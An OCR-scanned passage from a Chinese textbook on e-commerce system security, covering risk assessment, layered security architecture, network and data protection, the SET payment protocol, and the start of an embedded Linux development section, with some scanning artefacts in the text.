据 《〈 例 如 邮购 的 单据 、 和 凭证 等 ) 证 明 买 方 或 者 卖方 的 行为 。 而 网 络 上 的 交易 ， 则 可 能 出 
现 这 种 情况 ， 例 如 目前 国内 常见 的 “ 送 货 上 门 、 货 到 付款 ”， 扣 除 道德 原因 ， 确 实 很 难 
找 出 证 据 证 明 某 笔 订 单 确实 是 否 是 买方 的 。 电 子 交 易 的 不 可 抵赖 性 不 像 传统 交易 那样 通 
过 “ 白 纸 黑 字 ” 的 签字 、 盖 章 加 以 确认 ， 但 采取 了 类 似 的 思路 ， 通 过 电子 签名 加 以 确认 。 

电子 交易 的 安全 和 电子 商务 基础 设施 安全 是 一 个 整体 ， 不 能 割裂 开 来 分 别 考虑 。 基 
础 设施 的 安全 是 电子 交易 安全 的 基础 ， 不 能 设想 电子 交易 过 程 在 一 个 漏洞 百出 的 环境 中 
存在 安全 性 。 同 时 ， 电 子 交 易 的 安全 是 信息 基础 设施 安全 的 延伸 ， 它 是 在 传统 密码 学 、 
信息 系统 安全 基础 上 ， 针 对 电子 交易 过 程 特有 的 要 求 ， 通 过 在 网 络 、 认 证 等 方面 增添 相 
关 的 技术 措施 实现 的 。 所 以 ， 在 设计 电子 商务 系统 的 安全 系统 时 ， 应 当 从 基础 设施 和 电 
子 交 易 两 个 层次 出 发 ， 不 能 偏 废 。 在 电子 商务 系统 设计 阶段 ， 对 于 主机 、 数 据 库 、 操 作 
系统 和 其 他 系统 软件 ， 要 充分 考虑 到 这 些 系统 是 否 是 安全 的 ， 能 否 抵御 潜在 的 威胁 。 在 
设计 商务 应 用 软件 时 ， 也 要 考虑 到 如 何 能 够 保证 交易 过 程 是 可 靠 、 可 信和 的 。 
另外 ， 电 子 商 务 系统 的 安全 威胁 不 仅 来 自 外 部 ， 统 计 资 料 表 明 ， 更 多 的 威胁 是 来 自 
电子 商务 企业 的 内 部 ， 是 由 于 企业 内 部 安全 管理 的 措施 不 到 位 造成 的 。 因 此 ， 在 考虑 电 
子 商 务 系统 的 安全 设计 时 ， 不 能 单纯 地 将 其 作为 一 个 技术 问题 ， 也 要 同步 考虑 相关 的 安 
全 策略 、 安 全 管理 问题 。 只 有 将 软 、 硬 措施 都 考虑 到 ， 才 能 尽 可 能 减少 电子 商务 系统 的 
安全 风险 。 这 是 在 电子 商务 系统 安全 设计 中 需要 注意 的 一 个 问题 。 

在 了 解 电 子 商 务 系统 的 安全 需求 之 后 ， 需 要 对 电子 商务 系统 所 面临 的 风险 进行 分 析 
和 评估 。 决 定 电 子 商务 系统 敏感 性 等 级 的 因素 有 两 个 : 第 一 个 是 事故 的 直接 后 果 。 第 二 
个 应 考虑 的 因素 是 政治 上 和 企业 的 敏感 性 。 风 险 评估 流程 如 图 8-2 所 示 。 
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资产 识别 与 估价 


| | 


威胁 识别 与 评价 薄弱 点 识别 与 评价 已 有 安全 控制 的 确认 


风险 评估 
(测量 与 等 级 旭 分 ) 


! 
制定 安全 策略 


图 8-2 风险 评估 流程 


资产 识别 与 估价 是 针对 企业 现 有 信息 系统 及 资产 的 识别 ， 这 是 任何 一 个 企业 在 进行 
信息 安全 评估 所 必须 要 做 的 基础 性 工作 。 通 过 识别 每 一 个 企业 资产 ， 可 以 有 效 地 针对 威 
胁 和 影响 进行 建 模 分 析 。 

威胁 识别 与 评价 可 参考 表 8-1 所 示 。 


表 8-1 威胁 识别 与 评价 


危 险 性 
危险 不 太 活跃 ， 而 且 暴 露 于 
危险 中 的 机 会 不 很 多 
危险 并 不 明确 ， 而 且 危 险 是 
多 重 的 
危险 非常 活跃 ， 而 且 危 险 是 
多 重 的 


事故 结果 与 影响 评估 如 表 8-2 所 示 。 
R82 事故 结果 与 影响 评估 


事故 结果 评 事故 结果 的 影响 
没有 任何 影响 和 损失 ; 在 损失 预算 之 损失 在 生意 运作 中 可 以 接受 : 
内 : 风险 可 以 转移 或 对 企业 无 较 大 的 影响 
企业 内 部 的 正常 运行 受到 影响 超出 对 企业 的 运转 有 不 可 接受 的 影 
了 损失 预算 : 存在 机 会 成 本 响 


企业 外 部 的 生意 受到 影响 ; 对 企业 财 对 企业 的 经 营 管理 有 不 可 接受 
政 有 致命 的 影响 的 影响 
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详细 的 风险 评估 活动 如 表 8-3 所 示 。 
表 8-3 详细 的 风险 评估 活动 


风险 评估 和 管理 任务 详细 风险 评估 活动 
识别 和 列 出 安全 管理 范围 内 被 评估 的 商业 环境 、 运 作 和 信息 相关 
资产 识别 和 估价 的 所 有 的 资产 ， 定 义 一 个 价值 尺度 并 为 每 一 项 资产 分 配 价值 〈 保 
密 性 、 完 整 性 和 可 用 性 的 价值 
saat: 识别 与 资产 相关 的 所 有 威胁 ， 并 根据 它们 发 生 的 可 能 性 和 严重 性 
威胁 评估 He A 
为 它们 赋值 
薄弱 点 评估 识别 与 资产 相关 的 所 有 的 薄弱 点 ， 并 根据 它们 怎样 轻易 被 威胁 利 
用 来 为 它们 赋值 
现 有 的 和 计划 了 的 安全 控制 的 | 根据 前 期 评审 ， 将 所 有 现 有 的 和 计划 了 的 与 资产 相关 的 安全 控制 
识别 进行 识别 和 文件 化 
利用 上 述 对 资产 、 威 胁 、 薄 弱点 的 评价 结果 ， 进 行 风险 评估 ， 风 
风险 评估 险 为 资产 的 相对 价值 、 威 胁 发 生 的 可 能 性 与 薄弱 点 被 利用 的 可 能 


性 的 函数 ， 采 用 适当 的 风险 测量 工具 进行 风险 计算 

根据 从 上 述评 估 中 识别 的 风险 ， 适 当 的 安全 控制 需要 被 识别 以 阻 
止 这 些 风险 。 对 于 每 一 项 的 资产 ， 识 别 与 每 一 项 被 评估 的 风险 相 
关 的 控制 目标 。 根 据 对 这 些 资产 的 每 一 项 相关 的 威胁 和 薄弱 点 识 
别 安全 控制 ， 以 完成 这 些 目 标 。 最 后 ， 评 估 被 选择 的 安全 控制 在 
多 大 程度 上 降低 了 被 识别 的 风险 

对 残余 的 风险 加 以 分 类 ， 或 是 “可 接受 的 ”或 是 “不 可 接受 的 ”。 
对 孝 些 被 确认 是 “不 可 接受 的 ”， 决 定 是 否 应 该 选择 更 进一步 的 
控制 ， 或 者 接受 残留 风险 的 水 平 


通过 分 析 以 下 因素 ， 可 以 定义 电子 商务 系统 的 安全 需求 : 需要 保护 的 资源 、 资 源 面 
临 的 威胁 以 及 威胁 发 生 的 几率 。 通 过 风险 分 析 ， 可 以 确定 安全 规划 的 范围 。 安 全 规划 首 
先 需要 定义 规划 的 范围 ， 以 指明 规划 能 够 处 理 哪些 风险 。 规 划 范 围 准 确 地 限定 了 安全 规 
划 将 处 理 电 子 商务 系统 中 的 哪个 区 域 。 设 计 安全 方案 之 前 ， 企 业 必须 定义 规划 的 范围 ， 
以 指明 将 来 的 安全 方案 准备 处 理 哪些 风险 。 


8.2.5 ”电子 商务 系统 安全 架构 


典型 的 电子 商务 系统 的 安全 架构 如 图 8-3 所 示 。 

电子 商务 系统 安全 架构 从 安全 技术 与 安全 管理 两 个 层面 为 电子 商务 系统 提供 深度 、 
多 级 、 主 动 的 安全 防护 ， 包 括 安 全 技术 保障 与 安全 管理 运 维 两 个 部 分 。 

安全 技术 保障 包括 物理 安全 、 网 络 安全 、 服 务 安全 、 数 据 安全 、 行 为 安全 和 交易 安 
全 。 物 理 安全 包括 防 台风 、 防 雷击 、 防 火 、 防 水 、 防 静电 、 防 鼠 害 、 防 辐射 、 防 盗窃 、 


安全 控制 和 降低 风险 的 识别 和 
选择 


风险 接受 
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火灾 报警 及 消防 等 设施 和 措施 ， 网 络 安全 包括 防火 墙 、 虚 拟 专用 网 、 防 垃圾 邮件 、 防 拒 
绝 服务 攻击 、 入 侵 检测 、 入 侵 防 护 、 防 恶意 代码 、 网 络 接 入 、 网 络 隔离 、 内 容 过 滤 、 网 
络 审计 等 ， 服 务 安全 包括 双 机 热 备 、 运 行 容器 隔离 技术 、 容 侵 与 容错 技术 、 在 线 监控 与 
自动 恢复 技术 、 多 租户 隔离 技术 等 数据 安全 包括 数据 库 安全 、 数 据 加 解密 、 数 据 备份 
与 恢复 技术 等 ; 行为 安全 技术 包括 行为 监控 技术 、 入 侵 防护 技术 、 安 全 审计 技术 、 应 急 
响应 技术 等 ， 交 易 安 全 包括 安全 电子 支付 协议 、 电 子 支付 网 关 安 全 、 电 子 支付 接口 安全 
等 ， 综 合 通过 这 些 技 术 ， 确 保 电 子 商 务 系统 的 业务 连续 性 。 


电子 商务 系统 安全 基础 设施 


图 8-3 电子 商务 系统 安全 架构 


安全 管理 运 维 包括 安全 治理 、 安 全 运 维 、 安 全 评估 与 应 急 管 理 。 为 了 确保 电子 商务 
系统 的 安全 ， 需 要 建立 完善 的 安全 管理 制度 ， 对 信息 安全 基础 设施 进行 治理 、 运 维 、 评 
估 和 应 急 管 理 。 安 全 管理 制度 的 建立 包括 确定 信息 安全 管理 范围 、 制 定 信息 安全 方针 、 
明确 管理 职责 、 以 风险 评估 为 基础 选择 控制 目标 与 控制 方式 等 活动 。 建 立信 息 安全 管理 
运 维 体系 ， 首 先 必须 建立 安全 管理 机 构 ， 全 面 负责 企业 电子 商务 系统 信息 安全 工作 。 其 
次 ， 信 息 安 全 管理 机 构 对 企业 电子 商务 系统 管理 范围 进行 调查 评估 ， 依 照 国家 和 地 方 相 
关 信 息 安全 法 律 、 法 规 和 规范 ， 针 对 企业 电子 商务 系统 的 各 类 系统 应 用 ， 建 立 完善 的 信 
息 安 全 管理 制度 ， 规 范 电子 商务 系统 应 用 安全 建设 、 安 全 运 维 的 制度 ， 对 管理 人 员 和 操 
作 人 员 的 日 常 管理 建立 操作 流程 。 再 次 ， 由 安全 监理 人 员 对 安全 规范 的 执行 行为 进行 持 
续 性 的 审计 和 评估 ， 确 保 信息 系统 安全 风险 保持 在 可 接受 范围 内 。 

图 8-4 从 管理 、 服 务 、 模 块 依次 深入 的 角度 ， 曾 述 了 电子 商务 系统 的 信息 安全 视角 。 
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信息 安全 管理 
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数据 应 用 数据 库 安 全 数据 加 解密 应 用 安全 
网 络 防火 墙 。 “入侵 检测 。 防 DDOS VPN 防 垃圾 邮件 ARRE Web 安全 
系统 防 病毒 E 机 加 固 操作 系统 安全 
物理 环境 环境 安全 设备 安全 人 员 控 制 


图 8-4 电子 商务 网 站 安全 全 景 视图 


8.2.6 ”电子 商务 系统 安全 技术 


电子 商务 系统 的 安全 技术 包括 物理 环境 安全 、 系 统 安全 、 网 络 安 全 、 数 据 及 支付 安 
全 等 方面 。 
8.2.6.1 ”物理 环境 安全 

1. 环境 安全 

在 建立 站 点 场地 时 ， 应 注意 选择 站 址 ， 尽 量 建 在 电力 、 水 源 充 足 ， 自 然 环 境 清 洁 ， 
通信 、 交 通 运输 方便 的 地 方 ; 要 尽量 远离 有 害 气 源 及 存放 腐蚀 、 易 燃 、 易 爆炸 物 ;， 避免 
在 低洼 、 潮 湿 、 落 雷 区 和 地 震 活动 频繁 和 不 利于 抗 台风 的 地 方 ; 尽量 避 开 强 电磁 场 的 干 
tis 尽量 远离 强 振动 源 和 强 噪 声 源 ; 避免 在 建筑 物 的 高 层 及 地 下 室 ， 以 及 用 水 设备 的 下 
层 。 建 筑 物 的 位 置 、 结 构 、 强 度 应 满足 国家 现 有 的 标准 要 求 。 机 房 建设 应 满足 场地 建设 、 
防火 、 内 部 装修 、 供 配 电 系 统 、 空 调 系 统 、 火 警 及 消防 设施 、 防 水 、 防 静电 、 防 雷击 、 
防 台风 、 防 鼠 害 、 防 虫害 、 电 磁 波 的 防护 各 方面 的 要 求 。 台 风 、 和 雷击、 火灾 、 水 灾 、 地 
震 等 自然 灾难 会 对 系统 严重 破坏 ， 要 采取 有 效 的 预防 措施 ， 如 建筑 物 避 雷 、 防 震 、 防 
火 等 。 
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2. 设备 安全 

设备 安全 主要 包括 设备 的 防盗 、 防 毁 、 防 电磁 泄漏 、 防 止 线 路 截获 、 抗 电磁 干扰 、 
电源 保护 和 设备 老化 等 。 为 了 防止 设备 的 防盗 防 毁 ,应 制定 严格 的 管理 制度 ,专人 操作 、 
维护 ， 维 修 应 经 过 授权 并 有 负责 人 在 场 。 同 时 ， 设 备 要 有 宛 余 备份 ， 以 应 付 突 发 事件 的 
发 生 。 抑 制 和 防止 电磁 泄漏 主要 采取 的 方法 有 两 种 : 一 是 采用 屏蔽 双 绞 线 ， 或 尽 可 能 的 
采用 光纤 传输 ， 二 是 对 电源 线 和 信号 线 加 装 性 能 良好 的 滤波 器 ， 减 小 传输 阻抗 和 导线 间 
的 交叉 耦合 。 对 辐射 的 防护 可 分 为 以 下 两 种 : 一 是 采用 各 种 电磁 屏蔽 措施 ， 如 建立 屏蔽 
间 ; 对 设备 的 金属 屏蔽 和 各 种 接 插件 的 屏蔽 ， 同 时 对 机 房 的 下 水 管 、 暖 气管 和 金属 门窗 
进行 屏蔽 和 隔离 。 干 扰 的 防护 措施 ， 即 在 计算 机 系统 工作 的 同时 ， 利 用 干扰 装置 产生 一 
种 与 计算 机 系统 辐射 相关 的 伪 噪 声 向 空间 辐射 来 掩盖 计算 机 系统 的 工作 频率 和 信息 特 
征 。 防 止 线路 截获 可 以 采用 屏蔽 措施 ， 线 路 上 传输 的 信息 加 密 。 对 重要 设备 采用 屏蔽 和 
抗 干扰 措施 。 电 源 保护 主要 包括 : 配置 不 间断 电源 ; 配置 交流 稳 压 电源 ; 重要 系统 和 大 
型 系统 应 配备 多 种 供电 来 源 ; 配备 发 电 设备 。 应 定期 维护 和 检测 ， 并 有 硬件 备份 ， 制 定 
更 新 换代 计划 和 其 他 应 急 措施 。 

3. 人员 控制 

大 中 型 计算 机 房 应 采取 分 区 控制 ， 根 据 每 个 工作 人 员 的 实际 工作 需要 规定 能 进入 的 
区 域 ， 并 对 进入 、 退 出 时 间 及 进入 理由 进行 登记 。 对 无 权 进入 者 的 跨 区 域 访问 或 外 来 者 
进入 机 房 ， 必 须 经 过 有 关 安 全 管理 人 员 的 批准 。 对 人 员 实 施 身份 鉴别 。 
8.2.6.2 ”系统 安全 

1. 防 病毒 技术 

加 强 网 络 管理 员 安 全 管理 水 平 ， 提 高 安全 意识 ， 建 立 病毒 检测 系统 ， 建 立 应 急 响 应 
系统 ， 将 风险 减少 到 最 小 ， 建 立 灾难 备份 系统 ， 在 因特网 接 入 口 处 安装 防火 墙 式 防 杀 计 
算 机 病毒 产品 ， 将 病毒 隔离 在 局 域 网 之 外 ;对 邮件 服务 器 进行 监控 ， 防 止 带 毒 邮件 进行 
传播 ， 建 立 局 域 网 内 部 的 升级 系统 ， 包 括 各 种 操作 系统 的 补丁 升级 ， 各 种 常用 的 应 用 软 
件 升级 ， 各 种 杀毒 软件 病毒 库 的 升级 等 。 

2. 主机 安全 加 固 

通常 缺 省 安装 配置 下 的 主机 操作 系统 和 数据 库 面临 着 来 自 网 络 和 内 部 的 信息 泄漏 、 
密码 窃取 、 拒 绝 服务 攻击 、 缓 冲 区 溢出 攻击 等 威胁 ， 缺 省 配置 下 的 操作 系统 服务 无 法 有 
效 识别 系统 中 的 特洛伊 木马 程序 和 入 侵 者 安装 的 黑客 后 门 程序 等 ， 无 法 准确 记录 和 定位 
攻击 和 入 侵 者 的 足迹 。 通 过 主机 系统 加 固 技术 可 以 对 系统 的 缺陷 进行 弥补 ， 提 高 系统 的 
防御 能 力 。 

3. 操作 系统 安全 

对 操作 系统 的 安全 ,除了 不 断 地 增加 安全 补丁 外 , 还 需要 检查 系统 设置 (敏感 数据 的 
存放 方式 ， 访 问 控 制 ， 口 令 选择 /更 新 )， 将 系统 的 安全 级 别 设置 为 最 高 级 。 在 操作 系统 
中 安装 相关 监控 系统 来 保护 系统 。 常 用 操作 系统 安全 加 固 方 法 包括 : 补丁 加 载 ， 账 户 及 
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口令 的 设置 ， 登 录 控制 ， 关 闭 无 用 的 服务 ;文件 和 目录 权限 控制 ， 更 改 常用 的 重要 的 
命令 。 
8.2.6.3 ”网 络 安全 

1. 防火 墙 

电子 商务 系统 中 存在 多 个 系统 和 网 络 边界 ， 在 网 络 边界 处 实施 访问 控制 技术 ， 可 以 
隔离 攻击 控制 边界 对 内 部 资源 的 访问 。 根 据 边界 的 不 同情 况 ， 策 略 实施 的 方式 也 有 所 区 
别 。 防 火 墙 主要 由 服务 访问 规则 、 验 证 工具 、 包 过 滤 和 应 用 网 关 4 个 部 分 组 成 。 

2. 入 侵 检 测 

入 侵 检测 是 通过 从 计算 机 网 络 或 计算 机 系统 中 的 若干 关键 点 收集 信息 并 对 其 进行 
分 析 ， 从 中 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 的 一 种 安全 
技术 。 它 是 动态 安全 技术 中 最 核心 技术 之 一 。 传 统 的 操作 系统 加 固 技 术 和 防火 墙 隔离 技 
术 等 都 是 静态 安全 防御 技术 ， 对 网 络 环境 下 日 新 月 异 的 攻击 手段 缺乏 主动 的 反应 。 入 侵 
检测 技术 通过 对 入 侵 行为 的 过 程 与 特征 的 研究 ， 使 安全 系统 对 入 侵 事 件 和 入 侵 过 程 能 做 
出 实时 响应 。 

3. VLAN 

VLAN 限制 网 络 上 的 广播 , 将 网 络 划分 为 多 个 VLAN 可 减少 参与 广播 风暴 的 设备 数 
量 。VLAN 可 以 提供 建立 防火 墙 的 机 制 ， 防 止 交换 网 络 的 过 量 广播 。 可 以 将 某 个 交换 端 
口 或 用 户 赋予 某 一 个 特定 的 VLAN 组 ， 该 VLAN 组 可 以 在 一 个 交换 网 中 或 跨 接 多 个 交 
换 机 ， 在 一 个 VLAN 中 的 广播 不 会 送 到 VLAN 之 外 。 同 样 ， 相 邻 的 端口 不 会 收 到 其 他 
VLAN 产生 的 广播 。 这 样 可 以 减少 广播 流量 ， 释 放 带 宽 给 用 户 应 用 ， 减 少 广播 的 产生 。 

4. 虚拟 专用 网 络 VPN 

VPN 通过 公用 网 络 建立 一 个 临时 的 、 安 全 的 连接 ， 是 一 条 穿 过 混乱 的 公用 网 络 的 安 
全 、 稳 定 隧道 。 使 用 这 条 隧道 可 以 对 数据 进行 加 密 达 到 安全 使 用 互联 网 的 目的 。 

5. 防 DDOS 

对 付 DDOS 是 一 个 系统 工程 ， 想 仅仅 依靠 某 种 系统 或 产品 防御 DDOS 是 不 现实 的 ， 
可 以 肯定 的 是 , 完全 杜绝 DDOS 目前 是 不 可 能 的 ， 但 通过 适当 的 措施 抵御 90% 的 DDOS 
攻击 是 可 以 做 到 的 ， 基 于 攻击 和 防御 都 有 成 本 开销 的 缘故 ， 若 通过 适当 的 办 法 增强 了 抵 
御 DDOS 的 能 力 ， 也 就 意味 着 加 大 了 攻击 者 的 攻击 成 本 ， 那 么 绝 大 多 数 攻 击 者 将 无 法 继 
续 下 去 而 放弃 ， 也 就 相当 于 成 功 的 抵御 了 DDOS 攻击 。 主 要 包括 : 采用 高 性 能 的 网 络 设 
备 ; 尽量 避免 NAT 的 使 用 ; 充足 的 网 络 带宽 保证 ; 升级 主机 服务 器 硬件 ; 把 网 站 做 成 静 
态 页 面 ; 增强 操作 系统 的 TCP/IP 栈 ; 安装 专业 抗 DDOS 防火 墙 。 

6. Web 服务 器 安全 

Web Server 是 对 外 宣传 、 开 展业 务 的 重要 基地 。 由 于 其 重要 性 ， 成 为 黑客 攻击 的 首 
选 目 标 之 一 。Web Server 经 常 成 为 用 户 访问 部 门 内 部 资源 的 通道 之 一 ， 如 Web Server 通 
过 中 间 件 访问 主机 系统 ， 通 过 数据 库 连 接 部 件 访问 数据 库 ， 利 用 CGI 访问 本 地 文件 系统 
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或 网 络 系统 中 其 他 资源 。 但 Web 服务 器 越 来 越 复杂 ， 被 发 现 的 安全 漏洞 越 来 越 多 。 为 了 
防止 Web 服务 器 成 为 攻击 的 牺牲 品 或 成 为 进入 内 部 网 络 的 跳板 , 需要 提供 的 安全 措施 包 
括 : Web 服务 器 置 于 防火 墙 保护 之 下 ; 在 Web 服务 器 上 安装 实时 安全 监控 软件 ; 经 常 审 
查 Web 服务 器 配置 情况 及 运行 日 志 ; 运行 新 的 应 用 前 ， 先 进行 安全 测试 ， 如 新 的 CGI 
应 用 ; 认证 过 程 采用 加 密 通信 或 使 用 X.509 证 书 模式 ， 正 确 设置 Web 服务 器 的 访问 控 
制 表 。 

7. 电子 邮件 安全 

电子 邮件 系统 是 网 络 对 外 部 开放 的 服务 系统 之 一 。 由 于 电子 邮件 系统 的 复杂 性 ， 被 
发 现 的 安全 漏洞 非常 多 ， 并 且 和 危害 很 大 。 加 强 电子 邮件 系统 的 安全 性 ， 通 常 办 法 有 : 置 
一 台电 子 邮件 服务 器 作为 内 外 电子 邮件 通信 的 中 转 站 ， 所 有 出 入 的 电子 邮件 均 通过 该 中 
转 站 中 转 ， 为 该 服务 器 安装 实时 监控 系统 ， 邮 件 服务 器 作为 专门 的 应 用 服务 器 ， 不 运行 
任何 其 他 业务 ， 系 统 升级 到 最 新 的 安全 版 本 ; 利用 电子 邮件 系统 本 身 的 安全 性 ; 利用 病 
毒 防护 系统 加 强 邮 件 系 统 的 防 病毒 功能 ， 利 用 S/MIME 技术 对 电子 邮件 进行 加 密 传输 。 

8. ARTE 

内 容 过 滤 是 对 网 络 内 容 进 行 监控 ， 防 止 某 些 特定 内 容 在 网 络 上 进行 传输 的 技术 。 主 
要 实现 有 软件 和 硬件 两 种 。 软 件 过 滤 主 要 使 用 关键 词 匹配 的 方式 ， 将 特定 内 容 移 除 。 随 
着 互联 网 应 用 的 开展 ， 软 件 过 滤 无 法 处 理 飞 速 增长 的 流量 ， 于 是 硬件 过 滤 应 运 而 生 。 硬 
件 过 波 方 式 就 是 将 关键 词 匹配 功能 集成 在 控制 有 大 量 流 量 的 交换 机 或 路 由 器 中 ， 以 对 网 
络 中 的 流量 进行 监控 。 

9. 网 络 审计 

网 络 安全 审计 是 针对 业务 环境 下 的 网 络 操作 行为 进行 细 粒 度 审计 的 合 规 性 管理 。 它 
通过 对 被 授权 人 员 和 系统 的 网 络 行为 进行 解析 、 分 析 、 记 录 、 汇 报 ， 以 帮助 用 户 事前 规 
划 预 防 、 事 中 实时 监视 、 违 规 行为 响应 、 事 后 合 规 报告 、 事 故 追 踪 溯源 ， 从 而 加 强 内 外 
部 网 络 行为 监管 。 
8.2.6.4 ”数据 及 支付 安全 

1. 数据 库 加 密 

数据 库 加 密 系统 首先 要 解决 系统 本 身 的 安全 性 和 可 靠 性 问题 ， 在 这 方面 ， 可 以 采用 
以 下 儿 项 安全 措施 : 在 用 户 进入 系统 时 进行 两 级 安全 控制 ， 包 括 设置 数据 库 用 户 名 和 
令 ， 或 者 利用 IC 卡 读 写 器 /指纹 识别 器 进行 用 户 身份 认证 。 对 于 纯 软 件 系统 ， 可 以 采用 
软 指纹 技术 防止 非法 拷贝 ， 当 然 ， 如 果 每 台 客户 机 上 都 安装 加 密 卡 等 硬 部 件 ， 安 全 性 会 
更 好 。 安 全 数据 抽取 。 提 供 两 种 卸 出 和 装 入 数据 库 中 加 密 数据 的 方式 ; 其 一 是 密 文 方式 
印 出 ， 这 种 卸 出 方式 不 脱 密 ， 和 卸 出 的 数据 还 是 密 文 ， 在 这 种 模式 下 ， 可 直接 使 用 DBMS 
提供 的 卸 出 / 装 入 工具 ; 其 二 是 明文 方式 卸 出 ， 这 种 卸 出 方式 需要 脱 密 ， 务 出 的 数据 是 明 
文 ， 在 这 种 模式 下 ， 可 利用 系统 专用 工具 先进 行 数据 转换 ， 再 使 用 DBMS 提供 的 卸 出 / 
装 入 工具 完成 。 
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2. 数据 备份 与 恢复 

备份 介质 一 般 为 磁带 、 磁 盘 等 ， 依 靠 数 据 库 系统 提供 的 备份 技术 进行 数据 备份 与 恢 
复 ， 从 备份 时 间 上 考虑 又 分 为 增 量 备份 和 全 量 备份 。 脱 机 备份 主要 解决 数据 库 由 于 人 为 
因素 和 应 用 软件 错误 而 造成 的 数据 的 丢失 问题 。 若 只 设立 脱 机 备份 存储 介质 应 考虑 异地 
存放 措施 ， 避 免 自然 灾害 因素 带 来 的 损失 。 联 机 备份 可 分 为 本 地 的 联机 备份 和 异地 联机 
备份 ， 联 机 备份 增强 服务 的 连续 性 。 为 业务 数据 库 应 用 提供 备 援 服务 。 为 数据 库 的 分 布 
应 用 提供 支持 。 数 据 库 异地 联机 备份 的 技术 支持 主要 是 数据 库 自身 提供 的 ， 如 Oracle 的 
表 快 照 技 术 、Sybase 的 联机 事务 备份 技术 等 。 双 机 热 备份 是 利用 两 台 机 器 在 系统 出 现 故 
障 时 互相 进行 切换 的 一 种 技术 。 主要 为 服务 的 连续 性 提供 支持 , 主要 技术 为 True Cluster. 

3. 安全 电子 交易 协议 SET 

SET 是 由 VISA 和 MasterCard 两 大 信用 卡 组 织 联 合 开发 的 电子 商务 安全 协议 。 它 是 
一 种 基于 消息 流 的 协议 ， 用 来 保证 公共 网 络 上 银行 卡 支付 交易 的 安全 性 ， 因 而 成 为 互联 
网 上 进行 在 线 交 易 的 电子 付款 系统 规范 。 目 前 ，SET 协议 已 在 国际 上 被 大 量 实验 性 地 使 
用 ， 并 经 受 了 考验 ， 成 了 事实 上 的 工业 标准 。SET 是 一 个 复杂 的 协议 ， 它 详细 而 准确 地 
反映 了 信用 卡 交 易 各 方 之 间 的 各 种 关系 。 事 实 上 ，SET 不 只 是 一 个 技术 方面 的 协议 ， 它 
还 说 明了 每 一 方 所 持 有 的 数字 证 书 的 合法 含义 ， 希 望 得 到 数字 证 书 以 及 响应 信息 的 各 方 
应 有 的 动作 ， 与 一 笔 交 易 紧 密 相关 的 责任 分 担 。SET 协议 是 一 个 基于 可 信 的 第 三 方 认证 
中 心 的 方案 ， 它 要 实现 的 主要 目标 有 下 列 三 个 方面 : 保障 付款 安全 、 确 定 应 用 的 互通 性 
以 及 达到 全 球 市 场 的 可 接受 性 。 为 了 保证 参与 电子 商务 交易 各 方 身份 的 真实 性 ， 防 止 其 
诈 的 发 生 , 在 SET 协议 中 提出 了 认证 中 心 CA 的 概念 。 认 证 中 心 通过 向 电子 商务 各 参与 
方 发 放 数 字 证 书 来 确认 各 方 的 身份 ， 保 证 网 上 支付 的 安全 性 。 


8.3 ”嵌入 式 系统 的 安全 应 用 


目前 Linux 已 广泛 应 用 于 信息 家 电 、 数 据 网 络 、 工 业 控制 、 医 疗 卫生 航空 航天 等 众 
多 领域 。 在 嵌入 式 领 域 ， 随 着 价格 低廉 、 结 构 小 巧 的 各 种 微 处 理 器 的 产生 为 外 设 连 接 提 
供 了 稳定 可 靠 的 硬件 架构 ， 限 制 嵌 入 式 系统 发 展 的 瓶颈 就 突出 表现 在 软件 方面 。 

尽管 从 20 世纪 80 年 代 末 开始 ， 陆 续 出 现 了 一 些 嵌 入 式 操 作 系统 ， 比 较 著名 的 有 
Vxwork, pSOS, Neculeus 和 Windows CE。 但 这 些 专用 操作 系统 都 是 商业 化 产品 ， 其 
高 昂 的 价格 使 许多 低 端 产品 的 小 公司 望而却步 ， 并 且 其 源 代码 的 封闭 性 也 大 大 限制 了 开 
发 者 的 积极 性 。 

结合 中 国 实情 ， 当 前 国家 对 自主 操作 系统 的 大 力 支 持 ， 为 源码 开放 的 LINUX 的 推 
广 提供 的 广阔 的 发 展 前 景 。 对 上 层 应 用 开发 者 而 言 , 嵌入 式 系统 需要 的 是 一 套 高 度 简练 、 
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界面 友善 、 质 量 可 靠 、 应 用 广泛 、 易 开发 、 多 任务 ， 并 且 价 格 低廉 的 操作 系统 。Linux 对 
厂商 不 偏 不 倚 而 且 成 本 极 低 ， 能 够 很 快 成 为 用 于 各 种 设备 的 操作 系统 。 如 今 ， 业 界 已 经 
达成 共识 : 即 嵌 入 式 Linux 是 大 势 所 趋 ， 其 巨大 的 市 场 潜 力 与 酝酿 的 无 限 商机 必然 会 吸 
引 众多 的 厂商 进入 这 一 领域 。 


8.3.1 柑 和 人 式 系统 的 软件 开发 


在 一 个 嵌入 式 系 统 中 使 用 Linux 开发 ， 根 据 应 用 需求 的 不 同 有 不 同 的 配置 开发 方 
法 ， 但 是 一 般 都 要 经 过 如 下 的 过 程 : 

建立 开发 环境 ， 操 作 系 统一 般 使 用 REDHAT 一 LINUX， 版 本 7 到 9 都 可 以 ， 选 
择 定制 安装 或 全 部 安装 ， 通 过 网 络 下 载 相应 的 GCC 交叉 编译 器 进行 安装 〈 比 如 
arm-linux-gcc、arm-uclibc-gcc) ， 或 者 安装 产品 厂家 提供 的 交叉 编译 器 。 

配置 开发 主机 ， 配 置 MINICOM， 一 般 的 参数 为 波 特 率 115200， 数 据 位 8 位 ， 停 
止 位 1， 无 奇偶 校 验 ， 软 件 硬件 流 控 设 为 无 。 在 Windows 下 的 超级 终端 的 配置 也 是 这 
样 。MINICOM 软件 的 作用 是 作为 调试 媒 入 式 开发 板 的 信息 输出 的 监视 器 和 键盘 输入 的 
工具 。 配 置 网 络 ， 主 要 是 配置 NFS 网 络 文件 系统 ， 需 要 关闭 防火 墙 ， 简 化 嵌入 式 网 络 
调试 环境 设置 过 程 。 

建立 引导 装载 程序 BOOTLOADER, ， 从 网 络 上 下 载 一 些 公 开源 代码 的 
BOOTLOADER， 如 U-BOOT, BLOB, VIVI, LILO, ARM-BOOT, RED-BOOT 等 ， 
根据 自己 具体 芯片 进行 移植 修改 有 些 芯 片 没有 内 置 引 导 装 载 程序 , 比如 三 星 的 ARM7、 
ARM9 系列 芯片 ， 这 样 就 需要 编写 烧 写 开发 板 上 flash 的 烧 写 程序 ， 网 络 上 有 免费 下 载 
的 Windows 下 通过 JTAG 并 口 简易 仿真 器 烧 写 ARM 外 围 flash 芯片 的 烧 写 程序 。 
也 有 LINUX 下 的 公开 源 代码 的 J-FLASH 程序 。 如 果 不 能 烧 写 自己 的 开发 板 ， 就 需要 
